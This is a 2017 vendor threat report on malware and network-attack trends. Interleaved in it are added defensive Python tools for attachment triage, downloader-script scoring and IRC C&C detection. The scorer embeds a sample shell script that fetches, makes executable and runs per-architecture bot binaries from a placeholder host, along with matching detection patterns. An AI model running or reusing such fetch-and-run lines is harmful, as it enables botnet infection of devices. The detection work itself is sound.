Internet Security Report: Q1 2017 • 2
Contents
03 Introduction
04 Executive Summary
05 Firebox Feed Statistics
07 Malware Trends
08 Quarter-over-Quarter Malware Comparison
08 Malicious JavaScript Still Menaces
09 A Rise in Linux Malware
11 Evil Cross-platform Java Malware
11 Old Attacks: Malicious Perl Bot
12 A Pair of Generic Windows Trojans
12 Malicious Macros Hide in the Weeds
13 Geographic Malware Distribution
14 Zero Day vs Known Malware
15 Network Attack Trends
15 Top Network Attacks
16 Quarter-over-Quarter Attack Comparison
16 Web Battleground Shifts to Servers
16 Web Application Attacks Move Up
17 StageFright Returns to the Spotlight
18 Geographic Attack Distribution
20 Firebox Feed Statistics: Defense Learnings
20 Malicious JavaScript in Email
20 Web-based Linux Malware
20 Brazilian Banking Malware Campaign
21 Top Security Incidents
22 The CIA Vault 7 Leaks
25 Marble Framework Defense Learnings
26 WatchGuard Threat Lab’s IoT Research Project
27 Responsible Disclosure: Ouvis C2 HD Security Camera
31 IoT Research: Defensive Learnings
32 Conclusion & Defense Highlights
The Firebox® Feed provides
quantifiable data and trends
about hackers’ latest attacks, and
understanding these trends can
help us improve our defenses.
Introduction

Have you ever wondered what types of cyber attacks affect small to midsize businesses (SMBs) and distributed enterprises (DEs)? Well, you’ve come to the right place.
WatchGuard’s Internet Security Report is based on
Firebox Feed data coming from more than 26,000
unified threat management (UTM) appliances that
are monitoring and protecting SMBs and distributed
enterprises around the world. This data gives us
insights into what types of network exploits, malware
infections, and advanced attacks are launched by
cyber criminals every month, and how they change
and update their attacks over time. We share these
trends and insights with you every quarter in our
Internet Security Report.
The report for Q1 2017 includes:

Many trends and discoveries from the Firebox Feed
What types of malware do we catch most often in the wild? Which network services do attackers commonly target? What are the most popular attacks in different regions of the world? Which delivery mechanisms do cyber criminals most regularly rely on? You can learn all this and more in our Firebox Feed Statistics section.

Top Story: CIA Vault 7 leaks
Every quarter, you’re flooded with interesting and relevant information, security stories and incidents. Some of them can have industry-wide effects. This quarter our researchers comment on the CIA Vault 7 leak from Q1 2016 and share some additional technical analysis you didn’t see in the news.

Latest Internet of Things (IoT) research
The WatchGuard Threat Lab constantly runs security research projects to study the threats and issues affecting businesses today. For the last few quarters, our researchers have been analyzing the security of consumer IoT devices. This quarter we disclose a vulnerability we found in the Ouvis C2 HD Security Camera.

Most importantly, defensive learnings
While some might consider the threat landscape interesting on anecdotal merit alone, you can put these trends and learnings to good use. We share these trends and findings so that you can cater your defenses to the latest attacks. We share various protective tips throughout this report, and summarize with our top learnings.
We’re excited to share our second report based on data analysis from our Firebox Feed, and our additional research projects. We believe this quantifiable data gives us a deeper insight into the most prevalent threats our customers face and how cyber criminals craft their latest attacks. Our quarter-over-quarter analysis also shows how attackers evolve their techniques and focuses over time. We hope this report provides useful information, and you make it a regular part of your InfoSec awareness and training. Thanks for joining us this quarter, and read on for our latest threat landscape findings.
Executive Summary
Even when malware declines, other attacks rise. Consumers and businesses are
under the constant deluge of network attacks, phishing, and malware. Criminals
target Brazilian banks, nation-states anonymize their tools, and advanced threats
get past legacy defenses. If you want to keep your business online, you need to
stay vigilant against these attack trends so you can identify defenses for them.
This report provides some details around those and other trends. Here’s a high-level summary of some of the
things you’ll learn from this report:
• Linux malware is on the rise, making up 36% of the top malware we detected in Q1 (if you count PERL/Shellbot). We believe this increase comes from attackers targeting IoT devices.
• Legacy AV missed 38% of malware. In Q4, signature-based AV missed 30% of the threats we caught overall. This quarter, those misses increased 8% despite a general decline in malware detection overall. This means increasingly more malware evades traditional AV solutions.
• Threat actors take a break from hacking the holidays. Overall, threat volume decreased 52% in Q1 2017 compared to Q4 2016. We believe the drop in malware detections can be attributed to the absence of seasonal malware campaigns associated with various Q4 holidays, which increased overall malware instances during that period.
• Conversely, network attacks are up 37% compared to Q4, likely due to automated tools that always look for new victims.
• The web battleground shifted towards web servers. Last quarter, we saw more exploits that were used for drive-by downloads (web client attacks). In Q1, 82% of the top network attacks targeted web servers (or other web-based services).
• Our top ten XSS attack primarily targeted Spain. We aren’t sure why this particular cross-site scripting exploit was popular in Spain, but it was.
• Attackers still exploit the Android StageFright flaw. A mobile device vulnerability cracked our top ten attack list this quarter, breaking the previously unchallenged web attack theme.
• Criminals target Brazilian banks with cross-platform malware. We detected a large amount of email-based Java malware sent to victims in Brazil. We suspect this is part of the well-known Banloader banking malware campaign.
Those are just a few of the many trends this report explores. Read on for more in-depth explanations and
In Q1 2017 WatchGuard blocked over 4,151,210 network attacks (156 per device)* and 7,072,178 malware variants (266 per device)*.
* average per participating device
Firebox Feed Statistics
WatchGuard’s Firebox Feed provides quantifiable
data about the latest malware and network attacks
globally. The feed is a database of anonymized
threat data gathered from tens of thousands of
active Fireboxes around the globe. It records the
latest malware from our Gateway AntiVirus (GAV)
and APT Blocker services, and it archives the most
prevalent network attacks blocked by our Intrusion
Prevention Service (IPS) service. It also records
location data to learn how different threats affect
different geographic regions. It doesn’t, however,
capture any sensitive data about our customers’
networks or configurations, and allows customers to
opt out of this feed whenever they like.
The Firebox Feed currently only captures data
from a fraction of our customers, since it relies
on customers running the latest versions of our
firmware. However, with information from over
26,000 devices, the Firebox Feed provides a
statistically relevant view into today’s threats.
This section of the report highlights the malware and
network attack trends our Firebox Feed uncovered in
Q1 2017. Here we share our analysis of these trends,
and provide defense tips that help you avoid the
latest malware and attacks.
The threat landscape does not stand still. Cyber criminals constantly change
their tools, tactics, and campaigns to exploit the most opportune attack
techniques of the time. Savvy attackers pay attention to seasonal events, pop
culture, and other technological trends to leverage the latest tricks to hack
more victims. To keep up your defenses, you must remain aware of the latest
threat trends. Using this report, you can fine-tune your defenses to block the
latest threats.
Malware Trends

Most cyber attacks involve malware. After breaching your network, criminals usually want to establish “persistence,” meaning they want to find a way to retain access to your computer and network. Typically, they install malware to retain this persistence. This section details the malware-specific trends from our Q1 2017 data.

Our malware data comes from two Firebox services:
• The basic Gateway AntiVirus (GAV) service, which uses signatures and static heuristics to catch known malware.
• APT Blocker, our advanced malware prevention service, which uses behavior detection to catch new or “zero day” malware.

Let’s start with the raw Q1 2017 numbers:
• The Firebox Feed recorded threat data from 26,584 active Fireboxes, a 7.7% increase in devices reporting compared to Q4 2016.
• Our GAV service blocked 7,072,178 malware variants, an average of 266 malware samples blocked per Firebox. This represents a 52% decline in overall malware compared to last quarter, and a 56% decline in malware blocked per Firebox.
• APT Blocker stopped an additional 2,568,727 malware variants, a 34% decline from last quarter.

Figure 1: Top Ten Firebox GAV Hits for Q1 2017

THREAT NAME | CATEGORY | COUNT
FakeAlert | Generic Dropper | 670,261
PERL/ShellBot | PERL IRC Bot | 356,809
JS/Downloader.Agent | Malicious JavaScript | 256,390
Linux/Exploit | Generic Linux Trojan | 178,551
Win32/Heur | Generic Trojan | 165,996
Linux/Downloader | Generic Linux Downloader | 158,689
JS/Heur | Malicious JavaScript | 156,645
Java/Downloader | Generic Java Downloader | 83,123
Linux/Flooder | Generic Linux DDoS Tool | 82,127
Generic36.AAVT | Generic Bitcoin Miner | 77,704

Looking at those numbers, the first thing you notice is that malware detection dropped by about half, despite the Firebox Feed having almost two thousand more devices reporting in. Why is that?

We suspect this decline has to do with the seasonality of malware campaigns. The last quarter of the year includes many regional and global holidays, such as Thanksgiving and Christmas. Many of these holidays involve major shopping periods and retail events like Cyber Monday and Black Tuesday. Due to this increased spending, attackers specifically target these holiday and shopping periods, which probably accounts for the higher malware rates last quarter. As we continue our report annually, we’ll follow this trend to see if holiday-related malware increases are common year-over-year.

Besides the obvious decrease in overall malware, we also noticed a relative increase in advanced malware. While APT Blocker detections decreased in Q1, they decreased relatively less compared to the decline in GAV detections (a 34% decline compared to GAV’s 52%). In general, that means more malware got past legacy AV this quarter, and required advanced malware detection techniques to block. This seems to suggest that more threat actors are actively creating malware that evades legacy protections.

Rather than analyzing these ten samples individually, we’ll share the high-level trends they represent, and go into more detail about some of the samples.
Quarter-Over-Quarter Malware Analysis
Only four of the malware samples from our Q4 2016
report made it to this quarter’s top ten. Specifically:
• FakeAlert
• Linux/Exploit
• JS/Downloader.Agent
• JS/Heur
Two of those threats traded places for relevance.
Last quarter, Linux/Exploit was the number one
threat, and a good indicator of increased IoT attacks.
This quarter, it’s still relevant, but has dropped below
FakeAlert, which took over the top spot. If you’d like
to know more about either of these two samples, see the
malware section of last quarter’s Internet Security
Report. Meanwhile, the top JavaScript threats from
last quarter remain as relevant this quarter, which we
detail next.
Malicious JavaScript Still Menaces
JavaScript is a high-level scripting language most
commonly used on dynamic websites. While web
applications legitimately use JavaScript, attackers
commonly abuse it to help deliver malware.
Specifically, criminals tend to exploit malicious
JavaScript in two ways; either as malicious code
embedded on a website, or as malicious files sent via
email.
For the second quarter in a row, JavaScript malware
made up a large portion of the Firebox Feed top
statistics. Like last quarter, JS/Downloader.Agent and
JS/Heur both made our top ten list. Furthermore, we
continued to see many other malicious JavaScript
samples throughout our full top 100. In short, our
malware services block a lot of malicious JavaScript.
Network vs Endpoint Malware Detection: To evade detection technologies, modern malware arrives in multiple stages. Rather than directly sending you ransomware, attackers might send you a document that links to a website, that opens a malicious Java file, that installs a dropper or downloader, which finally downloads the actual ransomware onto the endpoint. This means network AV solutions detect and block malware at different stages in this delivery process than endpoint AV does. Network AV primarily “sees” the initial droppers and downloaders from the initial infection stages, whereas endpoint AV may see the final malware. For more on multi-stage malware, see this great post from IBM X-Force.
As mentioned before, malicious JavaScript is either
hosted directly on a malicious website to facilitate
drive-by-download attacks, or delivered as an
attachment in a convincing phishing email. In the
email scenario, JavaScript malware typically acts
as the first-stage dropper in a multi-stage attack.
Malware authors hope their victims run the malicious
JavaScript so it can download the second stage
malware, which might be ransomware or a remote
access trojan (RAT).
In the case of web attacks, criminals use JavaScript
to launch browser and software exploits. In fact,
some of the samples our Fireboxes detected are
associated with web-based exploit kits like Angler,
Neutrino, and RIG, which have previously delivered
ransomware like Locky and Nemucod.
Our data shows that malicious JavaScript plays a
big role in modern malware delivery, both over the
web and through email. Make sure you have security
controls that can identify malicious JavaScript,
including web reputation and advanced malware
protection services. We also encourage advanced
users to look into extensions like NoScript and
SafeScript, which can help you limit JavaScript while
also letting legitimate sites work. Finally, make sure
your users know never to open .JS files from an
email.
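The e-mail path described above (a script attachment acting as the first-stage dropper) is the one a mail gateway can catch before any user double-clicks. The following triage routine is an added example, not WatchGuard’s code: it parses a raw message, flags script-type attachments, looks inside ZIP archives, and notes decoy double extensions such as invoice.pdf.js. The message it inspects is constructed inline; the addresses and file names are placeholders.

```python
"""Triage e-mail attachments for script files that Windows would execute on double-click.

Added example for the delivery path described above (JavaScript sent as a first-stage
dropper); it is not WatchGuard's code. The message it inspects is constructed below.
"""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

# Extensions handled by the Windows Script Host, the shell or PowerShell when opened directly.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".cmd", ".bat"}
# Decoy document extensions commonly placed in front of the real one ("invoice.pdf.js").
DECOY_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}
MAX_INNER_FILE = 10_000_000  # do not decompress archive members larger than this


def _extension(name):
    name = name.lower().strip()
    return name[name.rfind("."):] if "." in name else ""


def _has_decoy_extension(name):
    parts = name.lower().split(".")
    return len(parts) >= 3 and "." + parts[-2] in DECOY_EXTENSIONS


def _inspect_file(name, data, container=""):
    """Return [(path, reason), ...] for one file; recurses into ZIP archives."""
    path = f"{container}/{name}" if container else name
    ext = _extension(name)
    findings = []
    if ext in SCRIPT_EXTENSIONS:
        reason = "script extension"
        if _has_decoy_extension(name):
            reason += " with decoy double extension"
        findings.append((path, reason))
    elif ext == ".zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                for info in archive.infolist():
                    if info.is_dir():
                        continue
                    inner = archive.read(info) if info.file_size <= MAX_INNER_FILE else b""
                    findings.extend(_inspect_file(info.filename, inner, container=path))
        except zipfile.BadZipFile:
            findings.append((path, "ZIP attachment could not be parsed"))
    return findings


def find_script_attachments(raw_message):
    """Parse a raw RFC 5322 message and return findings for every risky attachment."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        findings.extend(_inspect_file(name, payload))
    return findings


def build_sample_message():
    """Constructed test message: a ZIP hiding a double-extension .js beside a harmless PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Invoice_2017.pdf.js", "// placeholder text, not a real dropper\n")
    msg = EmailMessage()
    msg["From"] = "accounts@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Your invoice"
    msg.set_content("Please find the attached invoice.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="Invoice_2017.zip")
    msg.add_attachment(b"%PDF-1.4 placeholder", maintype="application", subtype="pdf",
                       filename="terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for path, reason in find_script_attachments(build_sample_message()):
        print(f"BLOCK {path}: {reason}")
```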
A Rise in Linux Malware

At least three of the top ten malware samples this quarter target Linux, showing that cyber criminals are focusing on this platform, likely for IoT-related attacks.
Last quarter, Linux/Exploit was the number one
malware sample blocked. While it dropped to
number four this quarter, it’s joined by two other
Linux threats; Linux Downloader and Linux Flooder.
Combined, these three hits show attackers are
increasingly targeting Linux systems.
Here’s a quick description of each threat:
1. Linux/Exploit is a generic detection rule that
catches several executable Linux (ELF) trojans.
You can read more about it in our last report. In general, these trojans infect a device, and
then scan networks looking for any other
devices hosting Telnet or SSH services. Once
the Telnet or SSH host devices are identified,
the trojan attempts to log in to them using
default credentials or via brute force. Once
they have access, they hijack the device by
either downloading a copy of a malicious Linux
executable (which could be Linux/Exploit) or
by running a script to add the host to a growing
botnet (a la Mirai botnet).
Figure 2: Example of malicious Linux shell script caught by Linux/Downloader
ALTERNATE NAMES:
Linux/TrojanDownloader
Linux/ShellDLoader
Trojan-Downloader.Shell.Agent
Script.Trojan.Agent
ALTERNATE NAMES: Linux.CornelGEN
2. Linux/Downloader joined the top ten malware
list this quarter. Linux/Downloader is a signature
that generically catches common Linux dropper
or downloader shell scripts. Rather than catching
malicious Linux executables (ELF files) like Linux/
Exploit, this signature catches the malicious shell
scripts that some attackers (or trojans) run to
download and install additional malware onto a
hijacked Linux device.
Linux runs on many different architectures, such
as ARM, MIPS, and traditional x86 chipsets.
An executable compiled for one architecture
will not run on a device running a different
one. Thus, some Linux attacks exploit dropper
shell scripts to download and install the proper
malicious components for the architecture they
are infecting. Here’s a sample of one of the
many Linux downloader scripts caught by this
signature.
3. Linux/Flooder also joined the Q1 top ten malware
list. This is another generic signature that
catches Linux-based distributed denial of service
(DDoS) tools. For instance, it catches tools like
the publicly released Tsunami tool. Tsunami is a
command line Linux tool designed to carry out
DNS amplification attacks. It’s based on an open
source DNS relay scanner called namescan. This
is one of the many possible Linux-based CLI
DDoS tools.
Linux/Flooder may also catch the DDoS tools
used by Linux-based botnets, like Mirai. As the
Mirai botnet showed us, Linux-based IoT devices
are a prime target for botnet armies. These
networked trojans often include tools for DDoS
attacks, as shown below.
ALTERNATE NAMES:
Dos.Linux.Agent
Linux.Flood
Trojan.Linux.Flooder
Linux/Dnsamp
Linux.BackDoor.Tsunami
As an aside, one might argue that the PERL/ShellBot
variant we describe below also qualifies as Linux
malware, since it primarily targets Linux systems.
This is because they tend to have Perl installed by
default. However, we decided to leave it out of this
section, and describe it in more detail later in this
report.
In summary, Linux attacks and malware are on the
rise. We believe this is because systemic weaknesses
in IoT devices, paired with their rapid growth, are
steering botnet authors towards the Linux platform.
Owners of Linux-based devices, including IoT hosts
and traditional Linux servers, should ensure they
properly secure their systems from external attacks.
Blocking inbound Telnet and SSH, along with using
complex administrative passwords, can prevent the
vast majority of potential attacks.
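The Linux/Downloader description above explains why these dropper scripts look the way they do: one binary per CPU architecture, fetched, marked executable, run, then removed. The scorer below is an added example, not WatchGuard’s signature logic; it weighs those indicators over a shell script body so that defenders can triage scripts pulled from a honeypot or a compromised host. Both scripts it checks are constructed here, use a reserved placeholder host, and are never executed.

```python
"""Heuristic scorer for multi-architecture Linux downloader shell scripts.

Added example for the Linux/Downloader discussion above; it is not WatchGuard's signature
logic. Both scripts below are constructed here and are never executed by this code.
"""
import re

# Constructed sample in the shape the report describes: fetch one binary per CPU
# architecture, mark it executable, run it, clean up. The host is a reserved placeholder.
SAMPLE_DOWNLOADER = """#!/bin/sh
cd /tmp || cd /var/run
for arch in mips mipsel arm arm7 x86 x86_64; do
  wget -q http://placeholder.invalid/bins/bot.$arch -O bot.$arch
  chmod +x bot.$arch
  ./bot.$arch
done
rm -rf bot.*
"""

# Constructed benign script for comparison: rotates logs, touches nothing else.
SAMPLE_BENIGN = """#!/bin/sh
find /var/log/app -name '*.log' -mtime +7 -exec gzip {} \\;
"""

ARCH_TOKEN = re.compile(r"\b(mips|mipsel|arm7?|armv\d|x86(?:_64)?|i[3-6]86|sh4|ppc|m68k|sparc)\b")

# name -> (pattern, weight). Each indicator is weak alone; the combination is what a
# downloader stage cannot avoid: fetch, make executable, run, and usually hide in a tmpfs.
INDICATORS = {
    "fetch_tool": (re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"), 2),
    "mark_executable": (re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"), 2),
    "run_local_file": (re.compile(r"(?:^|;|\s)\./[\w.$]+"), 2),
    "writable_dir": (re.compile(r"\bcd\s+/(?:tmp|var/run|dev/shm|mnt)\b"), 1),
    "self_cleanup": (re.compile(r"\brm\s+-rf?\b"), 1),
    "busybox": (re.compile(r"\bbusybox\b"), 1),
}
MULTI_ARCH_WEIGHT = 2
THRESHOLD = 5


def score_shell_script(text):
    """Return (score, sorted indicator names) for a shell script body."""
    lowered = text.lower()
    matched = []
    score = 0
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(lowered):
            matched.append(name)
            score += weight
    # Distinct architecture names: a legitimate script rarely enumerates several.
    archs = set(ARCH_TOKEN.findall(lowered))
    if len(archs) >= 2:
        matched.append(f"multi_arch:{len(archs)}")
        score += MULTI_ARCH_WEIGHT
    return score, sorted(matched)


def is_suspected_downloader(text, threshold=THRESHOLD):
    """Threshold chosen so that fetch + chmod alone (a normal installer) does not trigger."""
    return score_shell_script(text)[0] >= threshold


if __name__ == "__main__":
    for label, body in (("downloader", SAMPLE_DOWNLOADER), ("benign", SAMPLE_BENIGN)):
        print(label, score_shell_script(body))
```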
Figure 3: Mirai Command and Control Server
Evil Cross-platform Java Malware
Java is a general-purpose programming language
that is designed to run on many platforms.
Originally created by Sun Microsystems (now
owned by Oracle), Java is one of the most popular
programming languages used today. Everything from
web applications, to mobile devices, to normal client
software uses Java. People often confuse Java for
Javascript, but they are quite different. Javascript is
a high-level, runtime scripting language.
Unfortunately, Java has also developed a reputation
of insecurity. Over the years, researchers have
found countless vulnerabilities in the Java platform,
many of which allow attackers to bypass its
built-in sandbox, which is there to protect users.
Furthermore, sophisticated attackers are drawn
to Java because it runs equally well on Windows,
Mac, and Linux devices. Attackers exploit Java
downloaders in cross-platform attacks.
While Java threats were very common a few years
ago, this is the first time we’ve seen a Java threat
make our top ten list. Java/Downloader is a universal
signature that detects generic Java downloaders.
These bits of malicious code try to fingerprint a
victim’s operating system (OS), and then install the
corresponding malicious payload.
The most recent samples caught by Java/
Downloader are associated with a cross-platform
trojan called Banload, which targets South American
banks. This banking trojan infects both Windows and
Macintosh computers using this malicious Java code.
Our geographic data confirms this increase likely
relates to a South American bank attack campaign.
We’ll share more about this in our Geographic
Distribution section.
Old Attacks: Malicious Perl Shellbots
Last quarter, an old-style threat called a PHP
webshell made our top ten malware list. This quarter
that threat dropped entirely off our top 100 list,
only to get replaced with another outdated threat –
PERL/ShellBot.
PERL/ShellBot is a broad signature made to
detect malicious bots written in Perl (a high-level
programming language). Though Perl bots can run
on any platform with Perl installed, they tend to
affect Linux computers because they often install
Perl by default.
These malicious bots use the Internet Relay Chat
(IRC) service as a command and control (C&C)
channel for the attacker. Some of these malicious
Perl shellbots connect to IRC using the default port,
6667. However, others use non-standard IRC ports
like 23, or 3333, presumably to help avoid detection.
Like a normal botnet, attackers can leverage Perl
bots for just about any nefarious purpose, including
but not limited to DDoS attacks. Source code for
many Perl Shellbots have leaked publicly, resulting
in many variants based on the originals. Below is a GitHub-hosted sample of one such bot used for DDoS attacks.
JAVA/DOWNLOADER INFO:
• Generic Java downloader
• Related to banking malware (Banload)
• Sample hashes: 2c1189b57ff0cfdd18618f51955df8f1 cb6d19921c635683798b4dcc86fe607f 4478732742b8ccbf252cbb71766eb86 f27b92b58f510932cd117c4248955c9 e9d0672646d0478b0b3a8a3d334ee32 ccfcf52d14a07e2d7fb780809e6b6b73
• Alternate names: Java.Trojan.Generic Java:Malware-gen Java/Banload.U Mal/DrodZp-A TrojanDownloader.Java
PERL/SHELLBOT INFO:
• Perl-based IRC bot
• Related to ShellShock attack
• Sample hashes: 59b0f479a5ad937dd9d61635c4c855bc 66d85817e183b3e5120149721d3fcc19 1d37072882034f5a015fd3430f8169a7 8a838c86c038713b083b6fc07208ebc3 fe3323a44f0f536b94947dce2b229fc4
• Alternate names: Backdoor.Perl.Shellbot Unix/ShellBot Trojan.Perl.Shellbot
Figure 4: Example of publicly available DDoS Perl bot
In late 2014, a critical Linux Bash vulnerability surfaced called ShellShock. This flaw made it trivial for attackers to gain full root privileges on any Linux server that exposed Bash. At the time, attackers updated their malicious Perl bots to target this ShellShock vulnerability. Some of the samples we see associated with recent PERL/ShellBot detections are targeting this ShellShock vulnerability. If you haven’t already patched your Linux systems for ShellShock, you should do so immediately.
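The PERL/ShellBot section above notes that these bots talk IRC on the default port 6667 but also on ports like 23 or 3333 to slip past port-based rules. The detector below is an added example, not WatchGuard’s IPS logic: it recognises IRC by the registration commands at the start of the client stream (NICK, USER, JOIN) regardless of port, then separates standard-port IRC from IRC on ports where no IRC server belongs. The flow records, addresses and nicknames are constructed.

```python
"""Spot IRC command-and-control traffic by protocol content rather than port number.

Added example for the PERL/ShellBot discussion above (IRC C&C on 6667 as well as on
ports like 23 or 3333); it is not WatchGuard's IPS logic. The flow records are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    payload: bytes  # first bytes sent by the client, as a sensor would capture them


# Ports where IRC is expected; anything else carrying IRC registration traffic is notable.
IRC_PORTS = frozenset(range(6660, 6670)) | {6697}

# Commands a client sends when registering and joining (RFC 1459 / RFC 2812), one per line.
IRC_COMMAND = re.compile(rb"^(NICK|USER|PASS|JOIN|PRIVMSG|MODE|PING|PONG) ", re.MULTILINE)


def irc_commands(payload):
    """Return the set of distinct IRC commands that open this stream."""
    return {m.group(1) for m in IRC_COMMAND.finditer(payload)}


def looks_like_irc(payload):
    """Require two distinct commands so that a lone 'PING ' or 'USER ' does not trigger."""
    return len(irc_commands(payload)) >= 2


def classify_flows(flows):
    """Return [(flow, verdict)] for flows that carry IRC; verdict distinguishes the port class."""
    verdicts = []
    for flow in flows:
        if not looks_like_irc(flow.payload):
            continue
        if flow.dport in IRC_PORTS:
            verdicts.append((flow, "irc-standard-port"))
        else:
            verdicts.append((flow, f"irc-nonstandard-port-{flow.dport}"))
    return verdicts


# Constructed flows: two bots on the non-standard ports the report names, one ordinary
# IRC client, a genuine telnet option negotiation on 23, and a plain HTTP request.
SAMPLE_FLOWS = [
    Flow("10.0.0.12", "203.0.113.7", 3333, b"NICK [lnx]a8f2\r\nUSER bot 8 * :bot\r\nJOIN #ch\r\n"),
    Flow("10.0.0.15", "203.0.113.9", 23, b"NICK xq91\r\nUSER a b c :d\r\n"),
    Flow("10.0.0.20", "198.51.100.3", 6667, b"NICK alice\r\nUSER alice 0 * :Alice\r\n"),
    Flow("10.0.0.21", "198.51.100.4", 23, b"\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23"),
    Flow("10.0.0.22", "198.51.100.5", 80, b"GET / HTTP/1.1\r\nHost: example.invalid\r\n"),
]


def nonstandard_port_irc(flows=SAMPLE_FLOWS):
    """Destinations that deserve a closer look: IRC where no IRC server should be."""
    return [(f.dst, f.dport) for f, v in classify_flows(flows) if v != "irc-standard-port"]


if __name__ == "__main__":
    for flow, verdict in classify_flows(SAMPLE_FLOWS):
        print(f"{flow.src} -> {flow.dst}:{flow.dport}  {verdict}")
```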
A Pair of Generic Windows Trojans

To round out our top ten list, we also saw a pair of signatures that catch generic Windows trojans.
• Win32/Heur is about as generic a signature as
you get, and is known to catch many Windows-
based trojans, from Zbot and Zeus to Razy.
• Generic36.AAVT is also a broad signature that
catches Windows-specific malware. However, it’s
more specifically associated with Bitcoin Miner
trojans. This suggests a slight uptick in attackers
delivering Bitcoin mining malware in some
regions.
Malicious Macros Hide in the Weeds

Unlike last quarter, malicious macro-based Word documents did not make our top ten list. There was a clear decline in overall malicious macro documents in Q1. However, they’re still worth mentioning since we see these malicious documents sprinkled throughout our wider top 100 list.
Despite their decline, we recommend you continue
to warn your users against unsolicited documents,
and tell them not to enable macros if they do open
strange documents. See our last report for more
information on this waning threat.
Figure 5: Malware detection by region (EMEA 56.6%, Americas 21.8%, APAC 21.6%)
Geographic Malware Distribution

Overall, we see more malware blocked in EMEA than anywhere else, with over 56% of malware caught in this region. This continues the same overall regional trend from last quarter. While this could have to do with the sales and licensing of our products (APT Blocker is popular in Europe), it could also suggest criminals are launching more European malware campaigns.
Our regional trends change for the remaining percentage of malware though. Last quarter, most of the remaining malware affected the Americas, with only 6% of malware found in APAC. This quarter, the remaining malware is split evenly between the Americas and APAC, at approximately 22% each. This marks a significant increase in threats affecting the Asia-Pacific.
We also saw quite a few standout geographic trends
for individual malware variants:
1. We primarily found PERL/ShellBot in two
countries. 53% of the hits were found in Malaysia,
36.7% were found in the United States, and the
remaining 10.3% was distributed throughout
eleven other countries. It’s unclear why these
Perl bots are primarily targeting Malaysia and the
United States.
2. 84% of Win32/Heur was found in India.
3. The generic Bitcoin miner (Generic36.AAVT)
primarily targeted Canada, with 95% of the
detections.
4. 97% of our Java/Downloader detections were
from Brazil, confirming this threat is associated
with a known banking malware campaign targeting Brazilian banks.
5. The Linux threats display a wide range of
geographic curiosities.
a. Linux/Exploit affected many European and American countries, but had the highest numbers in the U.S. and the United Arab Emirates.
b. Linux/Downloader mostly affected Germany,
Great Britain, and Malaysia, but few others
to the same extent.
c. Finally, Linux/Flooder primarily affected
Germany and France.
6. The JavaScript malware was found in a wide range of countries, but Germany always led the list.
7. Though FakeAlert was found in over 100
countries, 44% came from Italy.
Malware affects all countries to some extent, but it is
interesting to see certain threats only affect specific
countries or regions. Pay close attention to the most
prominent threats by region, and consider adjusting
your defenses accordingly.
Zero Day vs Known Malware

As mentioned in the sidebar above, Firebox customers can also use our optional APT Blocker service to catch more advanced malware. APT Blocker runs suspicious files in a next-generation cloud sandbox, and monitors their behaviors to identify zero day malware that would be missed by signature-based detection solutions. When our GAV service doesn’t detect anything bad, our Firebox can still run additional APT Blocker checks to find brand new threats. By definition, if APT Blocker catches a threat, signature-based GAV missed it. By comparing these two services, you get a good idea of the ratio between newer “zero day malware,” which legacy AV solutions might miss, and known malware.
That said, not all our customers have APT Blocker.
For a one-to-one comparison, we count the total
GAV hits only on boxes that have APT Blocker.
According to our Firebox Feed, GAV found 4,198,242
known malware variants on boxes that also had APT
Blocker. Meanwhile, APT Blocker prevented 2,568,021
new malware variants on these same devices. This
means at least 38% of the malware our systems
discovered was zero day, and missed by legacy AV
solutions.
This illustrates the critical importance of advanced, behavior-based malware detection solutions today. Without them, AV solutions could miss more than one third of the malware spreading online. This is why so many networks that use basic AV become victims of threats like ransomware. We highly recommend you leverage advanced malware solutions like WatchGuard’s APT Blocker.
Figure 6: Known vs Zero Day Malware (38% of malware was zero day)
Network Attack Trends

To deliver malware, attackers must either rely on the mistakes of users, or take advantage of vulnerabilities found in network software. In the case of software vulnerabilities, WatchGuard’s Intrusion Prevention Service (IPS) is designed to detect these client and server-side exploits, and prevent them from working. This section of the report highlights the top network attacks.

At a high level, our IPS service blocked 4,151,210 network attacks, which averages to 156 intrusion attempts per Firebox customer. This represents around a 37% increase in the overall blocked network attacks this quarter compared to Q4. While cyber criminals may not have launched as many massive malware campaigns, it appears that other types of attacks are on the rise.

Below are the top network threats seen during this period.

Figure 7: Top Ten IPS Hits Q1 2017

SIGNATURE NAME | THREAT CATEGORY | AFFECTED PRODUCTS | CVE NUMBER | COUNT | SHARE
WEB URI Handler Buffer Overflow - POST -1 | Web Server | Windows web servers | CVE-2011-1965 | 532,565 | 40.6%
WEB HTTP Basic Authorization Header Buffer Overflow | Web Server | All web servers | CVE-2009-0183 | 192,899 | 14.7%
WEB Nginx HTTP_parse_chunked Buffer Overflow(1) | Web Server | Nginx | CVE-2013-2028 | 118,576 | 9%
WEB HTTP Host Header Buffer Overflow | Web Server | Apache | CVE-2003-0245 | 117,706 | 9%
WEB Cross-site Scripting -36 | Web Client | Any web application | CVE-2011-2133 | 115,446 | 8.8%
WEB Brute Force Login -1 | Web Server | Web app logins | n/a | 68,806 | 5.3%
WEB-CLIENT Javascript Obfuscation in EKs - 75 | Web Client | All web browsers | Multiple CVEs | 49,376 | 3.8%
WEB NetBSD tnftp fetch_url Command Execution(2) | Web-based FTP | tnftp (Apple, NetBSD, Linux) | CVE-2014-8517 | 47,076 | 3.6%
WEB-CLIENT Suspicious HTML Iframe Tag(4) | Web Client | All web browsers | n/a | 36,874 | 2.8%
Android libstagefright mp4 tx3g Atom Multiple Buffer Overflow -1 | Android buffer overflow | Android OS | CVE-2015-3824 | 31,085 | 2.4%

